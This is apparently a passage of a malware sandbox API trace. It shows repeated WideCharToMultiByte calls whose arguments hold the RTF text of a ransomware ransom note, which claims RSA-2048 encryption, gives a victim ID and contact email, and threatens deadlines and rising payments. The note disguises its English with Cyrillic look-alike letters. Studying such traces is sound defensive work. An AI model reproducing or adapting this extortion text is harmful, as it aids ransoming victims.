\\lang1049\\f0\\'c0\\lang1033\\f1 ft\\lang1049\\f0\\'e5\\lang1033\\f1 r this tim\\lang1049\\f0\\'e5\\lang1033\\f1 y\\lang1049\\f0\\'ee\\lang1033\\f1 ur uniqu\\lang1049\\f0\\'e5 \\lang1033\\f1 d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\'f0\\lang1033\\f1 ti\\lang1049\\f0\\'ee\\lang1033\\f1 n k\\lang1049\\f0\\'e5\\lang1033\\f1 y will b\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'e0\\lang1033\\f1 ut\\lang1049\\f0\\'ee\\lang1033\\f1 m\\lang1049\\f0\\'e0\\lang1033\\f1 tic\\lang1049\\f0\\'e0\\lang1033\\f1 ll\\lang1049\\f0\\'f3\\lang1033\\f1 d\\lang1049\\f0\\'e5\\lang1033\\f1 l\\lang1049\\f0\\'e5\\lang1033\\f1 t\\lang1049\\f0\\'e5\\lang1033\\f1 d \\lang1049\\f0\\'e0\\lang1033\\f1 nd fil\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0 d\\'e5\\'f1r\\'f3\\'f0ti\\'een will b\\'e5c\\'eem\\'e5 im\\'f0\\'eessibl\\'e5\\lang1033\\f1 !\\par\r\nHurr\\lang1049\\f0\\'f3\\lang1033\\f1 u\\lang1049\\f0\\'f0\\lang1033\\f1 ! \\lang1049\\f0\\'c5\\'e0\\'f1\\lang1033\\f1 h 12 h\\lang1049\\f0\\'ee\\lang1033\\f1 urs\\lang1049\\f0 \\lang1033\\f1 th\\lang1049\\f0\\'e5\\lang1033\\f1 p\\lang1049\\f0\\'e0\\'f3\\lang1033\\f1 m\\lang1049\\f0\\'e5\\lang1033\\f1 nt siz\\lang1049\\f0\\'e5\\lang1033\\f1 will b\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'e0\\lang1033\\f1 ut\\lang1049\\f0\\'ee\\lang1033\\f1 m\\lang1049\\f0\\'e0\\lang1033\\f1 tic\\lang1049\\f0\\'e0\\lang1033\\f1 ll\\lang1049\\f0\\'f3\\lang1033\\f1 in\\lang1049\\f0\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'e5\\'e0\\lang1033\\f1 s\\lang1049\\f0\\'e5\\lang1033\\f1 d b\\lang1049\\f0\\'f3\\lang1033\\f1 100$!\\lang1049\\f0\\par\r\n\\cf0\\b0\\'c0ll th\\'e5 \\'e0tt\\'e5mpts \\'eef d\\'e5\\'f1rypti\\'een by y\\'eeurs\\'e5lf will r\\'e5sult \\'eenly in irr\\'e5v\\'ee\\'f1\\'e0ble l\\'eess \\'eef y\\'eeur d\\'e0t\\'e0.\\par\r\nIf y\\'eeu still w\\'e0nt t\\'ee try t\\'ee d\\'e5crypt th\\'e5m by y\\'eeurs\\'e5lf pl\\'e5\\'e0s\\'e5 m\\'e0k\\'e5 \\'e0 b\\'e0ckup \\'e0t first b\\'e5c\\'e0us\\'e5 th\\'e5 d\\'e5\\'f1rypti\\'een will 
b\\'e5c\\'eem\\'e5 imp\\'eessibl\\'e5 in c\\'e0s\\'e5 \\'eef \\'e0ny ch\\'e0ng\\'e5s insid\\'e5 th\\'e5 fil\\'e5s.\\par\r\nIf y\\'eeu d", cchWideChar=5682, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5682 [0112.816] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset204 Calibri;}{\\f1\\fnil\\fcharset0 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;}\r\n{\\*\\generator Msftedit 5.41.21.2510;}\\viewkind4\\uc1\\pard\\ri-500\\sa200\\sl240\\slmult1\\tx8804\\b\\f0\\fs28\\'c0\\lang1033\\f1 tt\\lang1049\\f0\\'e5\\lang1033\\f1 nti\\lang1049\\f0\\'ee\\lang1033\\f1 n\\lang1049\\f0 ! \\'c0\\lang1033\\f1 ll\\lang1049\\f0 \\lang1033\\f1 y\\lang1049\\f0\\'ee\\lang1033\\f1 ur\\lang1049\\f0 \\lang1033\\f1 fil\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0 \\lang1033\\f1 w\\lang1049\\f0\\'e5\\lang1033\\f1 r\\lang1049\\f0\\'e5 \\'e5\\lang1033\\f1 n\\lang1049\\f0\\'f1\\lang1033\\f1 ry\\lang1049\\f0\\'f0\\lang1033\\f1 t\\lang1049\\f0\\'e5\\lang1033\\f1 d with RS\\lang1049\\f0\\'c0-\\lang1033\\f1 2048 \\lang1049\\f0\\'e0\\lang1033\\f1 lg\\lang1049\\f0\\'ee\\lang1033\\f1 rithm\\lang1049\\f0 .\\par\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\lang1033\\b0\\f1\\fs24 With\\lang1049\\f0\\'ee\\lang1033\\f1 ut \\lang1049\\f0\\'f3\\'ee\\lang1033\\f1 ur p\\lang1049\\f0\\'e5\\lang1033\\f1 rs\\lang1049\\f0\\'ee\\lang1033\\f1 n\\lang1049\\f0\\'e0\\lang1033\\f1 l d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\lang1033\\f1 pti\\lang1049\\f0\\'ee\\lang1033\\f1 n k\\lang1049\\f0\\'e5\\lang1033\\f1 y d\\lang1049\\f0\\'e0\\lang1033\\f1 t\\lang1049\\f0\\'e0\\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'ee\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 r\\lang1049\\f0\\'f3\\lang1033\\f1 is imp\\lang1049\\f0\\'ee\\lang1033\\f1 ssibl\\lang1049\\f0\\'e5\\lang1033\\f1 
!\\par\r\nT\\lang1049\\f0\\'ee \\lang1033\\f1 g\\lang1049\\f0\\'e5\\lang1033\\f1 t y\\lang1049\\f0\\'ee\\lang1033\\f1 ur uniqu\\lang1049\\f0\\'e5 \\lang1033\\f1 k\\lang1049\\f0\\'e5\\lang1033\\f1 y \\lang1049\\f0\\'e0\\lang1033\\f1 nd d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\'f0\\lang1033\\f1 t th\\lang1049\\f0\\'e5\\lang1033\\f1 fil\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0 , \\lang1033\\f1 Y\\lang1049\\f0\\'ee\\lang1033\\f1 u h\\lang1049\\f0\\'e0\\lang1033\\f1 v\\lang1049\\f0\\'e5 \\lang1033\\f1 to s\\lang1049\\f0\\'e5\\lang1033\\f1 nd th\\lang1049\\f0\\'e5\\lang1033\\f1 f\\lang1049\\f0\\'ee\\lang1033\\f1 ll\\lang1049\\f0\\'ee\\lang1033\\f1 wing c\\lang1049\\f0\\'ee\\lang1033\\f1 d\\lang1049\\f0\\'e5:\\par\r\n\\pard\\sa200\\sl240\\slmult1\\lang1033\\b\\f1\\fs28 COSLb0cVd9bCx1vp-3188F4D96148D062\\lang1049\\f0\\fs32\\par\r\n\\lang1033\\b0\\f1\\fs24 t\\lang1049\\f0\\'ee\\lang1033\\f1 \\lang1049\\f0\\'ee\\lang1033\\f1 ur \\lang1049\\f0\\'e5\\lang1033\\f1 -m\\lang1049\\f0\\'e0\\lang1033\\f1 il \\lang1049\\f0\\'e0\\lang1033\\f1 ddr\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0 : \\lang1033\\b\\f1\\fs28 bluetablet9643@yahoo.com\\lang1049\\b0\\f0\\fs32\\par\r\n\\lang1033\\f1\\fs24 Th\\lang1049\\f0\\'e5\\lang1033\\f1 n Y\\lang1049\\f0\\'ee\\lang1033\\f1 u will r\\lang1049\\f0\\'e5\\lang1033\\f1 ci\\lang1049\\f0\\'e5\\lang1033\\f1 v\\lang1049\\f0\\'e5 \\'e0\\lang1033\\f1 ll n\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0\\'e0\\lang1033\\f1 ry instru\\lang1049\\f0\\'f1\\lang1033\\f1 ti\\lang1049\\f0\\'ee\\lang1033\\f1 ns\\lang1049\\f0 .\\par\r\n\\cf1\\lang1033\\b\\f1 Y\\lang1049\\f0\\'ee\\lang1033\\f1 u h\\lang1049\\f0\\'e0\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'ee\\lang1033\\f1 nl\\lang1049\\f0\\'f3\\lang1033\\f1 \\lang1049\\f0 96\\lang1033\\f1 h\\lang1049\\f0\\'ee\\lang1033\\f1 urs t\\lang1049\\f0\\'ee\\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 
c\\lang1049\\f0\\'ee\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 r y\\lang1049\\f0\\'ee\\lang1033\\f1 ur d\\lang1049\\f0\\'e0\\lang1033\\f1 t\\lang1049\\f0\\'e0\\lang1033\\f1 ! \\lang1049\\f0\\'c0\\lang1033\\f1 ft\\lang1049\\f0\\'e5\\lang1033\\f1 r this tim\\lang1049\\f0\\'e5\\lang1033\\f1 y\\lang1049\\f0\\'ee\\lang1033\\f1 ur uniqu\\lang1049\\f0\\'e5 \\lang1033\\f1 d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\'f0\\lang1033\\f1 ti\\lang1049\\f0\\'ee\\lang1033\\f1 n k\\lang1049\\f0\\'e5\\lang1033\\f1 y will b\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'e0\\lang1033\\f1 ut\\lang1049\\f0\\'ee\\lang1033\\f1 m\\lang1049\\f0\\'e0\\lang1033\\f1 tic\\lang1049\\f0\\'e0\\lang1033\\f1 ll\\lang1049\\f0\\'f3\\lang1033\\f1 d\\lang1049\\f0\\'e5\\lang1033\\f1 l\\lang1049\\f0\\'e5\\lang1033\\f1 t\\lang1049\\f0\\'e5\\lang1033\\f1 d \\lang1049\\f0\\'e0\\lang1033\\f1 nd fil\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0 d\\'e5\\'f1r\\'f3\\'f0ti\\'een will b\\'e5c\\'eem\\'e5 im\\'f0\\'eessibl\\'e5\\lang1033\\f1 !\\par\r\nHurr\\lang1049\\f0\\'f3\\lang1033\\f1 u\\lang1049\\f0\\'f0\\lang1033\\f1 ! 
\\lang1049\\f0\\'c5\\'e0\\'f1\\lang1033\\f1 h 12 h\\lang1049\\f0\\'ee\\lang1033\\f1 urs\\lang1049\\f0 \\lang1033\\f1 th\\lang1049\\f0\\'e5\\lang1033\\f1 p\\lang1049\\f0\\'e0\\'f3\\lang1033\\f1 m\\lang1049\\f0\\'e5\\lang1033\\f1 nt siz\\lang1049\\f0\\'e5\\lang1033\\f1 will b\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'e0\\lang1033\\f1 ut\\lang1049\\f0\\'ee\\lang1033\\f1 m\\lang1049\\f0\\'e0\\lang1033\\f1 tic\\lang1049\\f0\\'e0\\lang1033\\f1 ll\\lang1049\\f0\\'f3\\lang1033\\f1 in\\lang1049\\f0\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'e5\\'e0\\lang1033\\f1 s\\lang1049\\f0\\'e5\\lang1033\\f1 d b\\lang1049\\f0\\'f3\\lang1033\\f1 100$!\\lang1049\\f0\\par\r\n\\cf0\\b0\\'c0ll th\\'e5 \\'e0tt\\'e5mpts \\'eef d\\'e5\\'f1rypti\\'een by y\\'eeurs\\'e5lf will r\\'e5sult \\'eenly in irr\\'e5v\\'ee\\'f1\\'e0ble l\\'eess \\'eef y\\'eeur d\\'e0t\\'e0.\\par\r\nIf y\\'eeu still w\\'e0nt t\\'ee try t\\'ee d\\'e5crypt th\\'e5m by y\\'eeurs\\'e5lf pl\\'e5\\'e0s\\'e5 m\\'e0k\\'e5 \\'e0 b\\'e0ckup \\'e0t first b\\'e5c\\'e0us\\'e5 th\\'e5 d\\'e5\\'f1rypti\\'een will b\\'e5c\\'eem\\'e5 imp\\'eessibl\\'e5 in c\\'e0s\\'e5 \\'eef \\'e0ny ch\\'e0ng\\'e5s insid\\'e5 th\\'e5 fil\\'e5s.\\par\r\nIf y\\'eeu d", cchWideChar=5682, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5682 [0112.816] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset204 Calibri;}{\\f1\\fnil\\fcharset0 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;}\r\n{\\*\\generator Msftedit 5.41.21.2510;}\\viewkind4\\uc1\\pard\\ri-500\\sa200\\sl240\\slmult1\\tx8804\\b\\f0\\fs28\\'c0\\lang1033\\f1 tt\\lang1049\\f0\\'e5\\lang1033\\f1 nti\\lang1049\\f0\\'ee\\lang1033\\f1 n\\lang1049\\f0 ! 
\\'c0\\lang1033\\f1 ll\\lang1049\\f0 \\lang1033\\f1 y\\lang1049\\f0\\'ee\\lang1033\\f1 ur\\lang1049\\f0 \\lang1033\\f1 fil\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0 \\lang1033\\f1 w\\lang1049\\f0\\'e5\\lang1033\\f1 r\\lang1049\\f0\\'e5 \\'e5\\lang1033\\f1 n\\lang1049\\f0\\'f1\\lang1033\\f1 ry\\lang1049\\f0\\'f0\\lang1033\\f1 t\\lang1049\\f0\\'e5\\lang1033\\f1 d with RS\\lang1049\\f0\\'c0-\\lang1033\\f1 2048 \\lang1049\\f0\\'e0\\lang1033\\f1 lg\\lang1049\\f0\\'ee\\lang1033\\f1 rithm\\lang1049\\f0 .\\par\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\lang1033\\b0\\f1\\fs24 With\\lang1049\\f0\\'ee\\lang1033\\f1 ut \\lang1049\\f0\\'f3\\'ee\\lang1033\\f1 ur p\\lang1049\\f0\\'e5\\lang1033\\f1 rs\\lang1049\\f0\\'ee\\lang1033\\f1 n\\lang1049\\f0\\'e0\\lang1033\\f1 l d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\lang1033\\f1 pti\\lang1049\\f0\\'ee\\lang1033\\f1 n k\\lang1049\\f0\\'e5\\lang1033\\f1 y d\\lang1049\\f0\\'e0\\lang1033\\f1 t\\lang1049\\f0\\'e0\\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'ee\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 r\\lang1049\\f0\\'f3\\lang1033\\f1 is imp\\lang1049\\f0\\'ee\\lang1033\\f1 ssibl\\lang1049\\f0\\'e5\\lang1033\\f1 !\\par\r\nT\\lang1049\\f0\\'ee \\lang1033\\f1 g\\lang1049\\f0\\'e5\\lang1033\\f1 t y\\lang1049\\f0\\'ee\\lang1033\\f1 ur uniqu\\lang1049\\f0\\'e5 \\lang1033\\f1 k\\lang1049\\f0\\'e5\\lang1033\\f1 y \\lang1049\\f0\\'e0\\lang1033\\f1 nd d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\'f0\\lang1033\\f1 t th\\lang1049\\f0\\'e5\\lang1033\\f1 fil\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0 , \\lang1033\\f1 Y\\lang1049\\f0\\'ee\\lang1033\\f1 u h\\lang1049\\f0\\'e0\\lang1033\\f1 v\\lang1049\\f0\\'e5 \\lang1033\\f1 to s\\lang1049\\f0\\'e5\\lang1033\\f1 nd th\\lang1049\\f0\\'e5\\lang1033\\f1 f\\lang1049\\f0\\'ee\\lang1033\\f1 ll\\lang1049\\f0\\'ee\\lang1033\\f1 wing c\\lang1049\\f0\\'ee\\lang1033\\f1 
d\\lang1049\\f0\\'e5:\\par\r\n\\pard\\sa200\\sl240\\slmult1\\lang1033\\b\\f1\\fs28 COSLb0cVd9bCx1vp-3188F4D96148D062\\lang1049\\f0\\fs32\\par\r\n\\lang1033\\b0\\f1\\fs24 t\\lang1049\\f0\\'ee\\lang1033\\f1 \\lang1049\\f0\\'ee\\lang1033\\f1 ur \\lang1049\\f0\\'e5\\lang1033\\f1 -m\\lang1049\\f0\\'e0\\lang1033\\f1 il \\lang1049\\f0\\'e0\\lang1033\\f1 ddr\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0 : \\lang1033\\b\\f1\\fs28 bluetablet9643@yahoo.com\\lang1049\\b0\\f0\\fs32\\par\r\n\\lang1033\\f1\\fs24 Th\\lang1049\\f0\\'e5\\lang1033\\f1 n Y\\lang1049\\f0\\'ee\\lang1033\\f1 u will r\\lang1049\\f0\\'e5\\lang1033\\f1 ci\\lang1049\\f0\\'e5\\lang1033\\f1 v\\lang1049\\f0\\'e5 \\'e0\\lang1033\\f1 ll n\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0\\'e0\\lang1033\\f1 ry instru\\lang1049\\f0\\'f1\\lang1033\\f1 ti\\lang1049\\f0\\'ee\\lang1033\\f1 ns\\lang1049\\f0 .\\par\r\n\\cf1\\lang1033\\b\\f1 Y\\lang1049\\f0\\'ee\\lang1033\\f1 u h\\lang1049\\f0\\'e0\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'ee\\lang1033\\f1 nl\\lang1049\\f0\\'f3\\lang1033\\f1 \\lang1049\\f0 96\\lang1033\\f1 h\\lang1049\\f0\\'ee\\lang1033\\f1 urs t\\lang1049\\f0\\'ee\\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'ee\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 r y\\lang1049\\f0\\'ee\\lang1033\\f1 ur d\\lang1049\\f0\\'e0\\lang1033\\f1 t\\lang1049\\f0\\'e0\\lang1033\\f1 ! 
\\lang1049\\f0\\'c0\\lang1033\\f1 ft\\lang1049\\f0\\'e5\\lang1033\\f1 r this tim\\lang1049\\f0\\'e5\\lang1033\\f1 y\\lang1049\\f0\\'ee\\lang1033\\f1 ur uniqu\\lang1049\\f0\\'e5 \\lang1033\\f1 d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\'f0\\lang1033\\f1 ti\\lang1049\\f0\\'ee\\lang1033\\f1 n k\\lang1049\\f0\\'e5\\lang1033\\f1 y will b\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'e0\\lang1033\\f1 ut\\lang1049\\f0\\'ee\\lang1033\\f1 m\\lang1049\\f0\\'e0\\lang1033\\f1 tic\\lang1049\\f0\\'e0\\lang1033\\f1 ll\\lang1049\\f0\\'f3\\lang1033\\f1 d\\lang1049\\f0\\'e5\\lang1033\\f1 l\\lang1049\\f0\\'e5\\lang1033\\f1 t\\lang1049\\f0\\'e5\\lang1033\\f1 d \\lang1049\\f0\\'e0\\lang1033\\f1 nd fil\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0 d\\'e5\\'f1r\\'f3\\'f0ti\\'een will b\\'e5c\\'eem\\'e5 im\\'f0\\'eessibl\\'e5\\lang1033\\f1 !\\par\r\nHurr\\lang1049\\f0\\'f3\\lang1033\\f1 u\\lang1049\\f0\\'f0\\lang1033\\f1 ! \\lang1049\\f0\\'c5\\'e0\\'f1\\lang1033\\f1 h 12 h\\lang1049\\f0\\'ee\\lang1033\\f1 urs\\lang1049\\f0 \\lang1033\\f1 th\\lang1049\\f0\\'e5\\lang1033\\f1 p\\lang1049\\f0\\'e0\\'f3\\lang1033\\f1 m\\lang1049\\f0\\'e5\\lang1033\\f1 nt siz\\lang1049\\f0\\'e5\\lang1033\\f1 will b\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'e0\\lang1033\\f1 ut\\lang1049\\f0\\'ee\\lang1033\\f1 m\\lang1049\\f0\\'e0\\lang1033\\f1 tic\\lang1049\\f0\\'e0\\lang1033\\f1 ll\\lang1049\\f0\\'f3\\lang1033\\f1 in\\lang1049\\f0\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'e5\\'e0\\lang1033\\f1 s\\lang1049\\f0\\'e5\\lang1033\\f1 d b\\lang1049\\f0\\'f3\\lang1033\\f1 100$!\\lang1049\\f0\\par\r\n\\cf0\\b0\\'c0ll th\\'e5 \\'e0tt\\'e5mpts \\'eef d\\'e5\\'f1rypti\\'een by y\\'eeurs\\'e5lf will r\\'e5sult \\'eenly in irr\\'e5v\\'ee\\'f1\\'e0ble l\\'eess \\'eef y\\'eeur d\\'e0t\\'e0.\\par\r\nIf y\\'eeu still w\\'e0nt t\\'ee try t\\'ee d\\'e5crypt th\\'e5m by y\\'eeurs\\'e5lf pl\\'e5\\'e0s\\'e5 m\\'e0k\\'e5 \\'e0 b\\'e0ckup \\'e0t first b\\'e5c\\'e0us\\'e5 th\\'e5 d\\'e5\\'f1rypti\\'een will 
b\\'e5c\\'eem\\'e5 imp\\'eessibl\\'e5 in c\\'e0s\\'e5 \\'eef \\'e0ny ch\\'e0ng\\'e5s insid\\'e5 th\\'e5 fil\\'e5s.\\par\r\nIf y\\'eeu d", cchWideChar=5682, lpMultiByteStr=0x1230018, cbMultiByte=5682, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset204 Calibri;}{\\f1\\fnil\\fcharset0 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;}\r\n{\\*\\generator Msftedit 5.41.21.2510;}\\viewkind4\\uc1\\pard\\ri-500\\sa200\\sl240\\slmult1\\tx8804\\b\\f0\\fs28\\'c0\\lang1033\\f1 tt\\lang1049\\f0\\'e5\\lang1033\\f1 nti\\lang1049\\f0\\'ee\\lang1033\\f1 n\\lang1049\\f0 ! \\'c0\\lang1033\\f1 ll\\lang1049\\f0 \\lang1033\\f1 y\\lang1049\\f0\\'ee\\lang1033\\f1 ur\\lang1049\\f0 \\lang1033\\f1 fil\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0 \\lang1033\\f1 w\\lang1049\\f0\\'e5\\lang1033\\f1 r\\lang1049\\f0\\'e5 \\'e5\\lang1033\\f1 n\\lang1049\\f0\\'f1\\lang1033\\f1 ry\\lang1049\\f0\\'f0\\lang1033\\f1 t\\lang1049\\f0\\'e5\\lang1033\\f1 d with RS\\lang1049\\f0\\'c0-\\lang1033\\f1 2048 \\lang1049\\f0\\'e0\\lang1033\\f1 lg\\lang1049\\f0\\'ee\\lang1033\\f1 rithm\\lang1049\\f0 .\\par\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\lang1033\\b0\\f1\\fs24 With\\lang1049\\f0\\'ee\\lang1033\\f1 ut \\lang1049\\f0\\'f3\\'ee\\lang1033\\f1 ur p\\lang1049\\f0\\'e5\\lang1033\\f1 rs\\lang1049\\f0\\'ee\\lang1033\\f1 n\\lang1049\\f0\\'e0\\lang1033\\f1 l d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\lang1033\\f1 pti\\lang1049\\f0\\'ee\\lang1033\\f1 n k\\lang1049\\f0\\'e5\\lang1033\\f1 y d\\lang1049\\f0\\'e0\\lang1033\\f1 t\\lang1049\\f0\\'e0\\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'ee\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 r\\lang1049\\f0\\'f3\\lang1033\\f1 is imp\\lang1049\\f0\\'ee\\lang1033\\f1 ssibl\\lang1049\\f0\\'e5\\lang1033\\f1 !\\par\r\nT\\lang1049\\f0\\'ee \\lang1033\\f1 g\\lang1049\\f0\\'e5\\lang1033\\f1 t y\\lang1049\\f0\\'ee\\lang1033\\f1 ur 
uniqu\\lang1049\\f0\\'e5 \\lang1033\\f1 k\\lang1049\\f0\\'e5\\lang1033\\f1 y \\lang1049\\f0\\'e0\\lang1033\\f1 nd d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\'f0\\lang1033\\f1 t th\\lang1049\\f0\\'e5\\lang1033\\f1 fil\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0 , \\lang1033\\f1 Y\\lang1049\\f0\\'ee\\lang1033\\f1 u h\\lang1049\\f0\\'e0\\lang1033\\f1 v\\lang1049\\f0\\'e5 \\lang1033\\f1 to s\\lang1049\\f0\\'e5\\lang1033\\f1 nd th\\lang1049\\f0\\'e5\\lang1033\\f1 f\\lang1049\\f0\\'ee\\lang1033\\f1 ll\\lang1049\\f0\\'ee\\lang1033\\f1 wing c\\lang1049\\f0\\'ee\\lang1033\\f1 d\\lang1049\\f0\\'e5:\\par\r\n\\pard\\sa200\\sl240\\slmult1\\lang1033\\b\\f1\\fs28 COSLb0cVd9bCx1vp-3188F4D96148D062\\lang1049\\f0\\fs32\\par\r\n\\lang1033\\b0\\f1\\fs24 t\\lang1049\\f0\\'ee\\lang1033\\f1 \\lang1049\\f0\\'ee\\lang1033\\f1 ur \\lang1049\\f0\\'e5\\lang1033\\f1 -m\\lang1049\\f0\\'e0\\lang1033\\f1 il \\lang1049\\f0\\'e0\\lang1033\\f1 ddr\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0 : \\lang1033\\b\\f1\\fs28 bluetablet9643@yahoo.com\\lang1049\\b0\\f0\\fs32\\par\r\n\\lang1033\\f1\\fs24 Th\\lang1049\\f0\\'e5\\lang1033\\f1 n Y\\lang1049\\f0\\'ee\\lang1033\\f1 u will r\\lang1049\\f0\\'e5\\lang1033\\f1 ci\\lang1049\\f0\\'e5\\lang1033\\f1 v\\lang1049\\f0\\'e5 \\'e0\\lang1033\\f1 ll n\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0\\'e0\\lang1033\\f1 ry instru\\lang1049\\f0\\'f1\\lang1033\\f1 ti\\lang1049\\f0\\'ee\\lang1033\\f1 ns\\lang1049\\f0 .\\par\r\n\\cf1\\lang1033\\b\\f1 Y\\lang1049\\f0\\'ee\\lang1033\\f1 u h\\lang1049\\f0\\'e0\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'ee\\lang1033\\f1 nl\\lang1049\\f0\\'f3\\lang1033\\f1 \\lang1049\\f0 96\\lang1033\\f1 h\\lang1049\\f0\\'ee\\lang1033\\f1 urs t\\lang1049\\f0\\'ee\\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'ee\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 r y\\lang1049\\f0\\'ee\\lang1033\\f1 ur d\\lang1049\\f0\\'e0\\lang1033\\f1 
t\\lang1049\\f0\\'e0\\lang1033\\f1 ! \\lang1049\\f0\\'c0\\lang1033\\f1 ft\\lang1049\\f0\\'e5\\lang1033\\f1 r this tim\\lang1049\\f0\\'e5\\lang1033\\f1 y\\lang1049\\f0\\'ee\\lang1033\\f1 ur uniqu\\lang1049\\f0\\'e5 \\lang1033\\f1 d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\'f0\\lang1033\\f1 ti\\lang1049\\f0\\'ee\\lang1033\\f1 n k\\lang1049\\f0\\'e5\\lang1033\\f1 y will b\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'e0\\lang1033\\f1 ut\\lang1049\\f0\\'ee\\lang1033\\f1 m\\lang1049\\f0\\'e0\\lang1033\\f1 tic\\lang1049\\f0\\'e0\\lang1033\\f1 ll\\lang1049\\f0\\'f3\\lang1033\\f1 d\\lang1049\\f0\\'e5\\lang1033\\f1 l\\lang1049\\f0\\'e5\\lang1033\\f1 t\\lang1049\\f0\\'e5\\lang1033\\f1 d \\lang1049\\f0\\'e0\\lang1033\\f1 nd fil\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0 d\\'e5\\'f1r\\'f3\\'f0ti\\'een will b\\'e5c\\'eem\\'e5 im\\'f0\\'eessibl\\'e5\\lang1033\\f1 !\\par\r\nHurr\\lang1049\\f0\\'f3\\lang1033\\f1 u\\lang1049\\f0\\'f0\\lang1033\\f1 ! \\lang1049\\f0\\'c5\\'e0\\'f1\\lang1033\\f1 h 12 h\\lang1049\\f0\\'ee\\lang1033\\f1 urs\\lang1049\\f0 \\lang1033\\f1 th\\lang1049\\f0\\'e5\\lang1033\\f1 p\\lang1049\\f0\\'e0\\'f3\\lang1033\\f1 m\\lang1049\\f0\\'e5\\lang1033\\f1 nt siz\\lang1049\\f0\\'e5\\lang1033\\f1 will b\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'e0\\lang1033\\f1 ut\\lang1049\\f0\\'ee\\lang1033\\f1 m\\lang1049\\f0\\'e0\\lang1033\\f1 